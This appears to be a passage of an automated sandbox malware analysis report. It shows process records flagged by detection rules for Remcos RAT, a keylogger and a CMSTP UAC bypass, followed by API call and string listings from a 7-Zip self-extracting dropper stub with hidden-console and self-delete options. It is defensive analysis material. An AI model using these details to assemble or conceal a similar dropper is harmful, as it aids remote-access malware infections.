Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:12:18
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe50000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:12:22
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe50000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.9%
Total number of Nodes:	1474
Total number of Limit Nodes:	20

Executed Functions

Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99

GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C

Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F

Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD

_wtol.MSVCRT ref: 0040509F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
_wtol.MSVCRT ref: 00405217
??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F

Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC

Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953

??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519

Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569

Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6

wsprintfW.USER32 ref: 00405595
_wtol.MSVCRT ref: 004057DE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
CoInitialize.OLE32(00000000), ref: 004059E9
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
GetKeyState.USER32(00000010), ref: 00405AA1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
memset.MSVCRT ref: 004060AE
ShellExecuteExW.SHELL32(?), ref: 0040617E
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB

Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
_wtol.MSVCRT ref: 00405F65
??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C

Strings

RunProgram, xrefs: 00405A66, 00405B6B, 00405B79
IA, xrefs: 004055D2, 004058FB
OverwriteMode, xrefs: 004056BB
InstallPath, xrefs: 004059F3
7zSfxString%d, xrefs: 0040558F
AutoInstall, xrefs: 00405AC1, 00405B1C, 00405ECC
ExecuteParameters, xrefs: 0040605D
@DA, xrefs: 00405699
7-Zip SFX, xrefs: 00406490
HelpText, xrefs: 0040595E
MiscFlags, xrefs: 0040573F
GUIMode, xrefs: 004056FF
ExecuteFile, xrefs: 00405A61, 00405B47, 00405B55
setup.exe, xrefs: 00405DE5, 00405DEA, 00405E45
i386, xrefs: 00405FD1
BeginPrompt, xrefs: 00405A71
;!@Install@!UTF-8!, xrefs: 00405436
amd64, xrefs: 00405FE4
Delete, xrefs: 00406352
nowait, xrefs: 00405F03
shc, xrefs: 00405F7A
Shortcut, xrefs: 0040632A
SelfDelete, xrefs: 0040577C, 0040640B
sfxconfig, xrefs: 0040527C, 00405488
sfxversion, xrefs: 004050D6
XpA, xrefs: 00405581
4DA, xrefs: 00406034
SetEnvironment, xrefs: 0040586E, 0040591F
forcenowait, xrefs: 00405F25
7ZipSfx.%03x, xrefs: 00405C77
FinishMessage, xrefs: 00406399
x86, xrefs: 00405FBE
4AA, xrefs: 0040504C
;!@InstallEnd@!, xrefs: 00405431
hidcon, xrefs: 00405E5E
x64, xrefs: 00405FF7
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406495
del, xrefs: 00405F9A
GUIFlags, xrefs: 0040571F

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
API String ID: 154539431-3058303289
Opcode ID: 487138a178580eda3ece8cfdceac7d94c04d5ea51ae98c448ec9f2ba9b6a03be
Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
Opcode Fuzzy Hash: 487138a178580eda3ece8cfdceac7d94c04d5ea51ae98c448ec9f2ba9b6a03be
Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
SetLastError.KERNEL32(00000010), ref: 0040303D

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E

Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
SendMessageW.USER32(00008001,00000000,?), ref: 004011FF

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00411E1C
__p__fmode.MSVCRT ref: 00411E31
__p__commode.MSVCRT ref: 00411E3F
__setusermatherr.MSVCRT ref: 00411E6B
_initterm.MSVCRT ref: 00411E81
__getmainargs.MSVCRT ref: 00411EA4
_initterm.MSVCRT ref: 00411EB4
GetStartupInfoA.KERNEL32(?), ref: 00411EF3
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00411F17
exit.KERNELBASE ref: 00411F27
_XcptFilter.MSVCRT ref: 00411F39

Strings

HpA, xrefs: 00411E9C, 00411E9F

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: HpA
API String ID: 801014965-2938899866
Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
DispatchMessageW.USER32(?), ref: 00401B89
KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
